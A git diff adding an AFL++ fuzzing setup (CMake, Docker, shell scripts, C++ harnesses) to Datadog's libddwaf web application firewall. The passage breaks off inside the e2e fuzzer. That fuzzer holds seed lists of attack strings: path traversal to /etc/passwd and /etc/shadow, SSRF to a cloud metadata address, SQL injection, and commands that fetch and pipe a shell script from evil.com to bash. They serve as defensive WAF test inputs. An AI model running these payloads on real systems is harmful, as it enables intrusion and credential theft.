set(FUZZER_ALL_SOURCES ${FUZZER_SOURCE}) + + # Find all other .cpp files in the same src directory + file(GLOB ADDITIONAL_SOURCES "${FUZZER_DIR}/*.cpp") + foreach(ADDITIONAL_SOURCE ${ADDITIONAL_SOURCES}) + # Skip main.cpp since it's already included + get_filename_component(ADDITIONAL_NAME ${ADDITIONAL_SOURCE} NAME) + if(NOT ${ADDITIONAL_NAME} STREQUAL "main.cpp") + list(APPEND FUZZER_ALL_SOURCES ${ADDITIONAL_SOURCE}) + endif() + endforeach() + + # Create the fuzzer target with all source files + add_afl_fuzzer(${FUZZER_NAME}_fuzz "${FUZZER_ALL_SOURCES}") + + # Add to our lists for dependencies and corpus creation + list(APPEND FUZZER_TARGETS ${FUZZER_NAME}_fuzz) + list(APPEND CORPUS_DIRS ${FUZZER_NAME}) endforeach() +# Generate corpus files during configuration phase if they don't exist +if(NOT EXISTS "${CMAKE_CURRENT_SOURCE_DIR}/global/sample_rules.yml") + message(STATUS "Generating corpus files using build_corpus.py...") + execute_process( + COMMAND python3 ${CMAKE_CURRENT_SOURCE_DIR}/global/scripts/build_corpus.py + WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}/.. + RESULT_VARIABLE BUILD_CORPUS_RESULT + OUTPUT_VARIABLE BUILD_CORPUS_OUTPUT + ERROR_VARIABLE BUILD_CORPUS_ERROR + ) + if(NOT BUILD_CORPUS_RESULT EQUAL 0) + message(FATAL_ERROR "Failed to generate corpus files: ${BUILD_CORPUS_ERROR}") + endif() + message(STATUS "Corpus files generated successfully") +endif() + +# Create a target to build corpus using Python script (for manual rebuilding) +add_custom_target(build_corpus + COMMAND ${CMAKE_COMMAND} -E echo "Building corpus using build_corpus.py..." + COMMAND python3 ${CMAKE_CURRENT_SOURCE_DIR}/global/scripts/build_corpus.py + WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}/.. + COMMENT "Regenerating corpus files and sample data for fuzzing" + VERBATIM +) + +# Create a target to build all fuzzers +add_custom_target(all_fuzzers DEPENDS ${FUZZER_TARGETS}) + +# Create a target to set up the fuzzing environment +add_custom_target(setup_fuzzing + DEPENDS all_fuzzers build_corpus +) diff --git a/fuzzer/README.md b/fuzzer/README.md new file mode 100644 index 000000000..bf0d24a02 --- /dev/null +++ b/fuzzer/README.md @@ -0,0 +1,93 @@ +# AFL++ Fuzzing Setup + +This folder contains `libfuzzer` harnesses with [AFL++](https://github.com/AFLplusplus/AFLplusplus/) wrapper for ease of use. + +## Structure + +``` +fuzz/ +├── common/ # Common utilities and generic wrapper +│ ├── afl_wrapper.hpp # Generic AFL++ wrapper +│ └── utils.hpp # Common utilities +├── docker/ # The dockerfile and script used to run the fuzzer easily +├── +│ └── corpus # Interesting seed inputs +│ ├── seed-1 +│ └── seed-2 +│ └── src # Individual main entrypoint for each fuzzer +│ └── main.cpp +``` + +## Usage + +### Building with Docker + +```bash +# Build the AFL++ Docker image +cd fuzz/docker +docker build -t libddwaf-afl . +``` + +### Running the fuzzer in docker + +```bash +# The added capabilities are useful to run GDB, but also perform kernel setting tweaks +docker run --privileged --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --security-opt seccomp=unconfined -v $(pwd):/workspace -it libddwaf-afl + +# Build all fuzzers +./fuzzer/docker/build.sh + +# Run all fuzzer +./fuzzer/docker/run_fuzzers.sh + +# Run a single fuzzer +./fuzzer/docker/run_fuzzers.sh e2e + +# Once you are done, you may want to minimize the corpus to sync it back in git +./fuzzer/docker/minimize_corpus.sh +``` + +## Adding New Fuzzers + +To add a new fuzzer: + +- Create a new folder in `/fuzzer/`, with a `src` and `corpus` directory. + - in `src`, put a main.cpp following the other files templates + - in corpus, add a `.gitkeep` file and at least a single file. +- run `./fuzzer/docker/build.sh` +- run `./fuzzer/docker/run_fuzzers.sh MY_NEW_FUZZER_NAME` + +Example: + +```cpp +#include "common/afl_wrapper.hpp" +#include "your_header.hpp" + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { + // Your fuzzing logic here + return 0; +} + +AFL_FUZZ_TARGET("your_fuzzer", LLVMFuzzerTestOneInput) +``` + +### Out of Docker fuzzer build + +You may need to follow AFL++ installation instruction to get the lastest dependencies. +It's likely you simply want to use Dockerfile mentioned above, available in the `./docker/` directory + +```bash +# Install AFL++ +git clone https://github.com/AFLplusplus/AFLplusplus +cd AFLplusplus +make && sudo make install + +# Build fuzzers +mkdir fuzzer/build +cd fuzzer/build +CC=afl-clang-lto CXX=afl-clang-lto++ cmake .. +make + +# Run fuzzer (change the corpus and output to the correct path) +afl-fuzz -i corpus/ -o output/ ./sha256_fuzz +``` diff --git a/fuzzer/cmdi_detector/corpus/.gitkeep b/fuzzer/cmdi_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/cmdi_detector/src/main.cpp b/fuzzer/cmdi_detector/src/main.cpp index d51be7b54..4523568dd 100644 --- a/fuzzer/cmdi_detector/src/main.cpp +++ b/fuzzer/cmdi_detector/src/main.cpp @@ -4,7 +4,9 @@ // This product includes software developed at Datadog (https://www.datadoghq.com/). // Copyright 2021 Datadog, Inc. +#include "../common/afl_wrapper.hpp" #include +#include #include #include "condition/cmdi_detector.hpp" @@ -33,20 +35,22 @@ std::pair, std::string_view> deserialize( return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); - if (size < sizeof(std::size_t)) { - return {}; - } - std::vector resource; resource.reserve(resource_size); for (std::size_t i = 0; i < resource_size; ++i) { - const auto arg_size = *reinterpret_cast(data); + if (size < sizeof(std::size_t)) { + return {}; + } + + std::size_t arg_size; + std::memcpy(&arg_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -65,7 +69,8 @@ std::pair, std::string_view> deserialize( return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(¶m_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -210,3 +215,6 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("cmdi_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/common/afl_wrapper.hpp b/fuzzer/common/afl_wrapper.hpp new file mode 100644 index 000000000..d076b0f06 --- /dev/null +++ b/fuzzer/common/afl_wrapper.hpp @@ -0,0 +1,160 @@ +// Unless explicitly stated otherwise all files in this repository are +// dual-licensed under the Apache-2.0 License or BSD-3-Clause License. +// +// This product includes software developed at Datadog (https://www.datadoghq.com/). +// Copyright 2021 Datadog, Inc. + +#pragma once + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// Standard includes for reading input +#include + +#define AFL_LOOP_ITERATIONS 1000 + +namespace ddwaf_afl { + +// Type alias for LLVMFuzzOneInput function +using FuzzFunction = std::function; +using InitFunction = std::function; + +// Standalone mode helper +int run_standalone(const char *name, FuzzFunction fuzz_func, int argc, char **argv) +{ + // Standalone mode - read from file or stdin for testing + std::vector data; + + if (argc > 1) { + // Read from file + std::ifstream file(argv[1], std::ios::binary); + if (!file) { + std::cerr << "Failed to open file: " << argv[1] << std::endl; + return 1; + } + + file.seekg(0, std::ios::end); + size_t size = file.tellg(); + file.seekg(0, std::ios::beg); + + data.resize(size); + file.read(reinterpret_cast(data.data()), size); + } else { + // Read from stdin + char buffer[4096]; + while (std::cin.read(buffer, sizeof(buffer)) || std::cin.gcount() > 0) { + size_t bytes_read = std::cin.gcount(); + data.insert(data.end(), buffer, buffer + bytes_read); + } + } + + if (data.empty()) { + std::cerr << "No input data provided" << std::endl; + return 1; + } + + std::cout << "Running " << name << " with " << data.size() << " bytes of input" << std::endl; + int result = fuzz_func(data.data(), data.size()); + std::cout << "Fuzzer returned: " << result << std::endl; + return result; +} + +// AFL++ mode helper - this will be called from main with proper persistent mode +int run_afl_iteration(FuzzFunction fuzz_func) +{ + static uint8_t input_buffer[1024 * 1024]; // 1MB buffer + + // Read input for this iteration + ssize_t len = read(STDIN_FILENO, input_buffer, sizeof(input_buffer)); + + if (len <= 0) { + return 0; // No input available + } + + // Call the actual fuzzing function + // Any crashes or hangs will be caught by AFL++ + fuzz_func(input_buffer, static_cast(len)); + + return 1; // Success +} + +} // namespace ddwaf_afl + +// Main macro that implements the correct AFL++ persistent mode pattern +#define AFL_FUZZ_TARGET(name, fuzz_func) \ + int main(int argc, char **argv) \ + { \ + /* Handle command line arguments for standalone mode */ \ + if (argc > 1) { \ + return ddwaf_afl::run_standalone(name, fuzz_func, argc, argv); \ + } \ + \ + /* AFL++ persistent mode loop - must be in main function */ \ + /* This runs up to AFL_LOOP_ITERATIONS iterations per process for better performance */ \ + while (__AFL_LOOP(AFL_LOOP_ITERATIONS)) { \ + if (!ddwaf_afl::run_afl_iteration(fuzz_func)) { \ + break; \ + } \ + } \ + \ + return 0; \ + } + +#define AFL_FUZZ_TARGET_WITH_INIT(name, fuzz_func, init_func) \ + int main(int argc, char **argv) \ + { \ + /* Handle initialization if provided */ \ + if (init_func) { \ + int result = init_func(&argc, &argv); \ + if (result != 0) { \ + std::cerr << "Initialization failed with code: " << result << std::endl; \ + return result; \ + } \ + } \ + \ + /* Handle command line arguments for standalone mode */ \ + if (argc > 1) { \ + return ddwaf_afl::run_standalone(name, fuzz_func, argc, argv); \ + } \ + \ + /* AFL++ persistent mode loop - must be in main function */ \ + /* This runs up to AFL_LOOP_ITERATIONS iterations per process for better performance */ \ + while (__AFL_LOOP(AFL_LOOP_ITERATIONS)) { \ + if (!ddwaf_afl::run_afl_iteration(fuzz_func)) { \ + break; \ + } \ + } \ + \ + return 0; \ + } + +// Convenience macros for common patterns +#define AFL_SIMPLE_TARGET(name, header, func_call) \ + extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) \ + { \ + func_call; \ + return 0; \ + } \ + AFL_FUZZ_TARGET(name, LLVMFuzzerTestOneInput) + +// For targets that need custom initialization +#define AFL_INIT_TARGET(name, header, init_code, func_call) \ + extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) \ + { \ + init_code; \ + return 0; \ + } \ + extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) \ + { \ + func_call; \ + return 0; \ + } \ + AFL_FUZZ_TARGET_WITH_INIT(name, LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/common/common.hpp b/fuzzer/common/common.hpp deleted file mode 100644 index 9cffc6497..000000000 --- a/fuzzer/common/common.hpp +++ /dev/null @@ -1,56 +0,0 @@ -// Unless explicitly stated otherwise all files in this repository are -// dual-licensed under the Apache-2.0 License or BSD-3-Clause License. -// -// This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include -#include -#include - -class random_buffer { -public: - random_buffer(const uint8_t *bytes, size_t size) : bytes_(bytes), size_(size) {} - - template T get() - { - if ((index_ + sizeof(T)) > size_) { - return {}; - } - - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - const T *value = reinterpret_cast(&bytes_[index_]); - index_ += sizeof(T) + (sizeof(T) % 2); - return *value; - } - - template <> bool get() - { - if (index_ >= size_) { - return false; - } - - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - bool value = bytes_[index_] > 0; - index_ += 2; - return value; - } - - template <> std::string_view get() - { - auto size = std::min(static_cast(get()) % 4096, size_ - index_); - if (size == 0) { - return ""; - } - - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - const auto *ptr = reinterpret_cast(&bytes_[index_]); - index_ += size + size % 2; - return {ptr, size}; - } - -protected: - const uint8_t *bytes_; - size_t size_; - size_t index_{0}; -}; diff --git a/fuzzer/common/utils.hpp b/fuzzer/common/utils.hpp new file mode 100644 index 000000000..868b401f9 --- /dev/null +++ b/fuzzer/common/utils.hpp @@ -0,0 +1,167 @@ +// Unless explicitly stated otherwise all files in this repository are +// dual-licensed under the Apache-2.0 License or BSD-3-Clause License. +// +// This product includes software developed at Datadog (https://www.datadoghq.com/). +// Copyright 2025 Datadog, Inc. + +#pragma once + +#include +#include +#include +#include + +namespace ddwaf_afl { + +// Utility to convert raw bytes to string_view +inline std::string_view bytes_to_string_view(const uint8_t *data, size_t size) +{ + return std::string_view{reinterpret_cast(data), size}; +} + +// Utility to split input data into multiple parts (useful for complex fuzzers) +class InputSplitter { +public: + InputSplitter(const uint8_t *data, size_t size) : data_(data), size_(size), offset_(0) {} + + template T get() + { + if (offset_ + sizeof(T) > size_) { + return T{}; + } + T value; + std::memcpy(&value, data_ + offset_, sizeof(T)); + offset_ += sizeof(T); + return value; + } + + std::string_view get_string() + { + if (offset_ >= size_) { + return {}; + } + + auto length = get(); + if (offset_ + length > size_) { + length = size_ - offset_; + } + + if (length == 0) { + return {}; + } + + std::string_view result{reinterpret_cast(data_ + offset_), length}; + offset_ += length; + return result; + } + + std::string_view get_remaining() + { + if (offset_ >= size_) { + return {}; + } + std::string_view result{reinterpret_cast(data_ + offset_), size_ - offset_}; + offset_ = size_; + return result; + } + + bool has_data() const { return offset_ < size_; } + + size_t remaining_bytes() const { return offset_ < size_ ? size_ - offset_ : 0; } + +private: + const uint8_t *data_; + size_t size_; + size_t offset_; +}; + +// Simple serializer for complex input formats +class InputSerializer { +public: + InputSerializer() = default; + + void add_string(std::string_view str) + { + uint16_t length = static_cast(str.size()); + data_.insert(data_.end(), reinterpret_cast(&length), + reinterpret_cast(&length) + sizeof(length)); + data_.insert(data_.end(), reinterpret_cast(str.data()), + reinterpret_cast(str.data()) + str.size()); + } + + template void add_value(const T &value) + { + data_.insert(data_.end(), reinterpret_cast(&value), + reinterpret_cast(&value) + sizeof(value)); + } + + const std::vector &data() const { return data_; } + const uint8_t *raw_data() const { return data_.data(); } + size_t size() const { return data_.size(); } + +private: + std::vector data_; +}; + +// Memory resource setup (common across fuzzers) +inline void setup_memory_resource() +{ + // This would typically set up ddwaf memory resource + // For now, we'll assume it's handled elsewhere +} + +// Prevent compiler optimization of results +template inline void prevent_optimization(T &value) +{ + asm volatile("" : "+m"(value) : : "memory"); +} + +// Random buffer utility for processor fuzzers +class random_buffer { +public: + random_buffer(const uint8_t *bytes, size_t size) : bytes_(bytes), size_(size) {} + + template T get() + { + if ((index_ + sizeof(T)) > size_) { + return {}; + } + + T value; + std::memcpy(&value, &bytes_[index_], sizeof(T)); + index_ += sizeof(T) + (sizeof(T) % 2); + return value; + } + + template <> bool get() + { + if (index_ >= size_) { + return false; + } + + // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) + bool value = bytes_[index_] > 0; + index_ += 2; + return value; + } + + template <> std::string_view get() + { + auto size = std::min(static_cast(get()) % 4096, size_ - index_); + if (size == 0) { + return ""; + } + + // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) + const auto *ptr = reinterpret_cast(&bytes_[index_]); + index_ += size + size % 2; + return {ptr, size}; + } + +protected: + const uint8_t *bytes_; + size_t size_; + size_t index_{0}; +}; + +} // namespace ddwaf_afl \ No newline at end of file diff --git a/fuzzer/docker/Dockerfile b/fuzzer/docker/Dockerfile new file mode 100644 index 000000000..b6759da58 --- /dev/null +++ b/fuzzer/docker/Dockerfile @@ -0,0 +1,91 @@ +# AFL++ Docker Image for libddwaf fuzzing +FROM ubuntu:22.04 + +# Avoid interactive prompts during package installation +ENV DEBIAN_FRONTEND=noninteractive + +# Install basic dependencies and add LLVM repository +RUN apt-get update && apt-get install -y \ + wget \ + gnupg \ + software-properties-common \ + && wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | apt-key add - \ + && echo 'deb http://apt.llvm.org/jammy/ llvm-toolchain-jammy-19 main' > /etc/apt/sources.list.d/llvm-toolchain.list \ + && apt-get update + +# Install system dependencies +RUN apt-get install -y \ + build-essential \ + cmake \ + git \ + curl \ + vim \ + python3 \ + python3-pip \ + llvm-19 \ + llvm-19-dev \ + llvm-19-tools \ + lcov \ + clang-19 \ + lld-19 \ + libc++-19-dev \ + libc++abi-19-dev \ + ninja-build \ + libssl-dev \ + libcurl4-openssl-dev \ + zlib1g-dev \ + xxd \ + gdb \ + linux-tools-common \ + linux-tools-generic \ + linux-tools-$(uname -r) \ + && rm -rf /var/lib/apt/lists/* + +# Set up clang as default compiler +RUN update-alternatives --install /usr/bin/clang clang /usr/bin/clang-19 100 && \ + update-alternatives --install /usr/bin/clang++ clang++ /usr/bin/clang++-19 100 && \ + update-alternatives --install /usr/bin/llvm-config llvm-config /usr/bin/llvm-config-19 100 && \ + update-alternatives --install /usr/bin/llvm-profdata llvm-profdata /usr/bin/llvm-profdata-19 100 && \ + update-alternatives --install /usr/bin/llvm-cov llvm-cov /usr/bin/llvm-cov-19 100 + +# Clone and build AFL++ +WORKDIR /opt +RUN git config --global --add safe.directory /workspace && git clone https://github.com/AFLplusplus/AFLplusplus.git +WORKDIR /opt/AFLplusplus + +# Build AFL++ with LTO support +RUN make clean && \ + make -j$(nproc) all && \ + make install + +# Clone and build libddwaf +WORKDIR /opt +RUN git clone --recursive https://github.com/airbus-seclab/afl-cov-fast.git +WORKDIR /opt/afl-cov-fast +RUN pip3 install -r requirements.txt + + +# Set AFL++ environment variables +ENV AFL_SKIP_CPUFREQ=1 +ENV AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1 +ENV PATH="/opt/AFLplusplus:${PATH}" + +# Create workspace directory +WORKDIR /workspace + +# Copy build script +COPY build.sh /opt/build.sh +RUN chmod +x /opt/build.sh + +# Create user for safer fuzzing +RUN useradd -m -s /bin/bash fuzzer && \ + chown -R fuzzer:fuzzer /workspace + +# Default command +CMD ["/bin/bash"] + +# Expose common AFL++ environment setup +ENV CC=afl-clang-lto +ENV CXX=afl-clang-lto++ +ENV AFL_USE_ASAN=1 +ENV AFL_USE_UBSAN=1 \ No newline at end of file diff --git a/fuzzer/docker/build.sh b/fuzzer/docker/build.sh new file mode 100755 index 000000000..01f08bb84 --- /dev/null +++ b/fuzzer/docker/build.sh @@ -0,0 +1,61 @@ +#!/bin/bash + +# Build script for AFL++ libddwaf fuzzing + +set -e + +echo "Building libddwaf with AFL++ instrumentation..." + +# Set AFL++ environment +export CC=afl-clang-lto +export CXX=afl-clang-lto++ +export AFL_USE_ASAN=1 + +echo "Building corpus (required for building, since we embed the generated file to its header)" +# Run the corpus builder so the global fuzzer can be built & run (it embeds the generated file to its header) +python3 fuzzer/global/scripts/build_corpus.py + +# Create build directory +mkdir -p /workspace/build +cd /workspace/build + +echo "Building libddwaf with AFL++ instrumentation..." +cmake .. \ + -DCMAKE_BUILD_TYPE=Debug \ + -DCMAKE_C_COMPILER=${CC} \ + -DCMAKE_CXX_COMPILER=${CXX} \ + -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" \ + -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" + +# Build the project +make -j$(nproc) + +echo "Building AFL++ fuzzers..." + +echo "Building AFL++ fuzzers..." +# Build individual AFL++ fuzzers +cd /workspace/fuzzer +mkdir -p build +cd build + +cmake .. \ + -DCMAKE_BUILD_TYPE=Debug \ + -DCMAKE_C_COMPILER=${CC} \ + -DCMAKE_CXX_COMPILER=${CXX} \ + -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" \ + -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" + +echo "Building fuzzers with $(nproc) threads" + +make -j$(nproc) + +echo "AFL++ fuzzers built successfully!" +echo "Available fuzzers:" +ls -la *_fuzz + +echo "" +echo "To run in Docker:" +echo "docker run -v \$(pwd):/workspace -it libddwaf-afl" +echo "" +echo "Then run a fuzzer (it should also run fine on a linux host):" +echo "afl-fuzz -i corpus_dir -o output_dir ./sha256_fuzz @@" \ No newline at end of file diff --git a/fuzzer/docker/minify_corpus.sh b/fuzzer/docker/minify_corpus.sh new file mode 100755 index 000000000..94e727eab --- /dev/null +++ b/fuzzer/docker/minify_corpus.sh @@ -0,0 +1,57 @@ +#!/bin/bash + +# Script to minify the corpus for all fuzzers + +PROJECT_ROOT="/workspace" +FUZZER_BUILD_DIR="$PROJECT_ROOT/fuzzer/build" +AFL_FUZZ_DIR="$PROJECT_ROOT/o" + +# Check if we're in the container environment +if [[ ! -f "/opt/build.sh" ]]; then + echo "Warning: This script is designed to run in the fuzz container." + echo "Consider running: docker run --rm -v \$(pwd):/workspace fuzzer-image ./fuzzer/docker/minify_corpus.sh" +fi + +cd "$PROJECT_ROOT" + +# Define all fuzzers based on the available binaries +# TODO: automatically detect all fuzzers in the build directory +FUZZERS=( + "cmdi_detector" + "e2e" + "http_endpoint_fingerprint" + "http_header_fingerprint" + "http_network_fingerprint" + "jwt_decode" + "lfi_detector" + "session_fingerprint" + "sha256" + "shell_tokenizer" + "shi_detector_array" + "shi_detector_string" + "sql_tokenizer" + "sqli_detector" + "ssrf_detector" + "uri_parse" + "global" +) + + +for fuzzer in "${FUZZERS[@]}"; do + echo "Starting minification for $fuzzer..." + echo "deleting previous minified corpus..." + rm -rf corpus_minified_$fuzzer + # We move all the new things in the queue + echo "Moving new things in the queue to the native corpus..." + cp -f $AFL_FUZZ_DIR/$fuzzer/default/queue/* $PROJECT_ROOT/fuzzer/$fuzzer/corpus/ + + echo "Minifying corpus..." + afl-cmin -T $(nproc) -i $PROJECT_ROOT/fuzzer/$fuzzer/corpus -o corpus_minified_$fuzzer $FUZZER_BUILD_DIR/${fuzzer}_fuzz + + echo "Cleaning up old corpus and previous minified corpus..." + rm -rf $PROJECT_ROOT/fuzzer/$fuzzer/corpus/* + mkdir -p $PROJECT_ROOT/fuzzer/$fuzzer/corpus/ + mv corpus_minified_$fuzzer/* $PROJECT_ROOT/fuzzer/$fuzzer/corpus/ + rm -rf corpus_minified_$fuzzer + echo "Done" +done \ No newline at end of file diff --git a/fuzzer/docker/run_fuzzers.sh b/fuzzer/docker/run_fuzzers.sh new file mode 100755 index 000000000..1d9ce317e --- /dev/null +++ b/fuzzer/docker/run_fuzzers.sh @@ -0,0 +1,165 @@ +#!/bin/bash + +# Script to run AFL++ fuzzers for a few seconds each and generate coverage report +# Usage: ./run_all_fuzzers.sh [fuzzer_name] +# - No argument or "all": Run all fuzzers +# - fuzzer_name: Run specific fuzzer + +set -e + +PROJECT_ROOT="/workspace" +FUZZER_BUILD_DIR="$PROJECT_ROOT/fuzzer/build" +OUTPUT_DIR="$PROJECT_ROOT/o" +FUZZER_TIMEOUT=10s + +# Check if we're in the container environment +if [[ ! -f "/opt/build.sh" ]]; then + echo "Warning: This script is designed to run in the fuzz container." + echo "Consider running: docker run --rm -v \$(pwd):/workspace fuzzer-image ./fuzzer/run_all_fuzzers.sh [fuzzer_name]" +fi + +cd "$PROJECT_ROOT" + +# Create output directories +mkdir -p "$OUTPUT_DIR" + +# Define all fuzzers based on the available binaries +# TODO: automatically detect all fuzzers in the build directory +ALL_FUZZERS=( + "cmdi_detector" + "e2e" + "http_endpoint_fingerprint" + "http_header_fingerprint" + "http_network_fingerprint" + "jwt_decode" + "lfi_detector" + "session_fingerprint" + "sha256" + "shell_tokenizer" + "shi_detector_array" + "shi_detector_string" + "sql_tokenizer" + "sqli_detector" + "ssrf_detector" + "uri_parse" + "global" +) + +# Parse command line arguments +TARGET_FUZZER="$1" + +# Determine which fuzzers to run +if [[ -z "$TARGET_FUZZER" || "$TARGET_FUZZER" == "all" ]]; then + FUZZERS=("${ALL_FUZZERS[@]}") + echo "=== Running ALL AFL++ fuzzers for a few seconds each ===" + echo "Found ${#FUZZERS[@]} fuzzers to run" +else + # Check if the specified fuzzer exists in the list + if [[ " ${ALL_FUZZERS[*]} " =~ " $TARGET_FUZZER " ]]; then + FUZZERS=("$TARGET_FUZZER") + echo "=== Running $TARGET_FUZZER fuzzer ===" + else + echo "❌ Error: Fuzzer '$TARGET_FUZZER' not found." + echo "Available fuzzers:" + printf " - %s\n" "${ALL_FUZZERS[@]}" + exit 1 + fi +fi + +echo "" + +# Function to run a single fuzzer and generate its coverage +run_fuzzer() { + local fuzzer_name="$1" + local binary="$FUZZER_BUILD_DIR/${fuzzer_name}_fuzz" + local corpus_dir="$PROJECT_ROOT/fuzzer/$fuzzer_name/corpus" + local output_dir="$OUTPUT_DIR/$fuzzer_name" + local coverage_dir="$OUTPUT_DIR/$fuzzer_name" + + if [[ ! -f "$binary" ]]; then + echo "❌ Binary not found: $binary" + return 1 + fi + + if [[ ! -d "$corpus_dir" ]]; then + echo "❌ Corpus directory not found: $corpus_dir" + return 1 + fi + + echo "🚀 Running $fuzzer_name fuzzer..." + echo " Binary: $binary" + echo " Corpus: $corpus_dir" + echo " Output: $output_dir" + echo " Coverage: $coverage_dir" + + # Clean up previous output for this fuzzer + rm -rf "$output_dir" + rm -rf "$coverage_dir" + mkdir -p "$output_dir" + mkdir -p "$coverage_dir" + + # Set AFL environment variables + export AFL_SKIP_CPUFREQ=1 + export AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1 + export AFL_FAST_CAL=1 + + # Run AFL++ with timeout + timeout $FUZZER_TIMEOUT afl-fuzz -i "$corpus_dir" -o "$output_dir" -D "$binary" || { + local exit_code=$? + if [[ $exit_code -eq 124 ]]; then + echo "✅ $fuzzer_name completed (60s timeout reached)" + else + echo "⚠️ $fuzzer_name exited with code $exit_code" + fi + } + + # Generate individual coverage report for this fuzzer + echo "📊 Generating coverage for $fuzzer_name..." + echo " Coverage output: $coverage_dir" + + # Run afl-cov-fast for this specific fuzzer + /opt/afl-cov-fast/afl-cov-fast.py \ + -m llvm \ + --code-dir "$PROJECT_ROOT" \ + --afl-fuzzing-dir "$output_dir" \ + --coverage-cmd "$binary" \ + --binary-path "$binary" \ + -j$(nproc) || { + echo "⚠️ Coverage generation failed for $fuzzer_name" + } + + echo "✅ $fuzzer_name fuzzing and coverage complete" + echo "" +} + +# Run all fuzzers sequentially +for fuzzer in "${FUZZERS[@]}"; do + run_fuzzer "$fuzzer" +done + +echo "=== All fuzzers completed ===" +echo "" +echo "=== Individual Coverage Reports Generated ===" +echo "📊 Coverage reports available for each fuzzer:" +echo "" + +# Display coverage report locations for each fuzzer +for fuzzer in "${FUZZERS[@]}"; do + index_file="$OUTPUT_DIR/$fuzzer/cov/web/index.html" + if [[ -f "$index_file" ]]; then + echo "✅ $fuzzer: $index_file" + else + echo "❌ $fuzzer: Coverage report not found" + fi +done + +echo "" +echo "" + +# find all fuzzers that have any amount of crashing files created +for fuzzer in "${FUZZERS[@]}"; do + if [[ -d "$OUTPUT_DIR/$fuzzer/default/crashes" ]] && [[ -n "$(ls -A "$OUTPUT_DIR/$fuzzer/default/crashes" 2>/dev/null)" ]]; then + crash_count=$(ls -1 "$OUTPUT_DIR/$fuzzer/default/crashes" 2>/dev/null | wc -l) + echo "❌ Crash found for $fuzzer: $crash_count files in $OUTPUT_DIR/$fuzzer/default/crashes" + fi +done \ No newline at end of file diff --git a/fuzzer/e2e/corpus/.gitkeep b/fuzzer/e2e/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/e2e/corpus/f6523aa50a5372e0f6916c334d31d4ce6e73d520 b/fuzzer/e2e/corpus/f6523aa50a5372e0f6916c334d31d4ce6e73d520 new file mode 100644 index 000000000..a1e617aa1 Binary files /dev/null and b/fuzzer/e2e/corpus/f6523aa50a5372e0f6916c334d31d4ce6e73d520 differ diff --git a/fuzzer/e2e/src/main.cpp b/fuzzer/e2e/src/main.cpp new file mode 100644 index 000000000..07fa62a2c --- /dev/null +++ b/fuzzer/e2e/src/main.cpp @@ -0,0 +1,857 @@ +// Unless explicitly stated otherwise all files in this repository are +// dual-licensed under the Apache-2.0 License or BSD-3-Clause License. +// +// This product includes software developed at Datadog (https://www.datadoghq.com/). +// Copyright 2025 Datadog, Inc. + +#include +#include +#include +#include +#include +#include + +// Include internal header for memory resource access +#include "context_allocator.hpp" + +// Include JSON utilities +#include "../../tests/common/json_utils.hpp" + +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" + +// Include embedded configuration +#include "embedded_configs.hpp" + +using namespace ddwaf; +using namespace ddwaf_afl; +using namespace std::literals; + +// Global WAF handle - initialized once with the json rules embeed in the binary +static ddwaf_handle g_waf_handle = nullptr; + +// Global WAF context - reused for all test cases to avoid allocation overhead +static ddwaf_context g_waf_context = nullptr; + +const std::vector attack_uris = { + "/app?file=../../../../etc/passwd", // LFI attack + "/search?q=test; cat /etc/passwd", // CMDI attack + "/proxy?url=http://169.254.169.254/metadata", // SSRF attack + "/download?path=../../../windows/system32/config/sam", // LFI Windows + "/exec?cmd=wget http://evil.com/shell.sh", // CMDI with download + "/redirect?target=file:///etc/hosts", // SSRF file scheme + "/api/v1/users?filter='; DROP TABLE users;--", // SQL injection + "/upload?filename=shell.php%00.jpg" // Null byte injection +}; + +const std::vector attack_queries = { + "file=../../../../etc/passwd&type=include", // LFI attack + "cmd=ls -la; cat /etc/shadow && whoami", // CMDI with shell operators + "url=http://127.0.0.1:8080/admin", // SSRF attack + "path=..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", // LFI Windows + "exec=curl -o /tmp/shell http://evil.com/backdoor.sh | bash", // CMDI with pipe + "redirect=gopher://internal.company.com:25", // SSRF gopher + "include=/proc/self/environ", // LFI proc + "system=$(wget 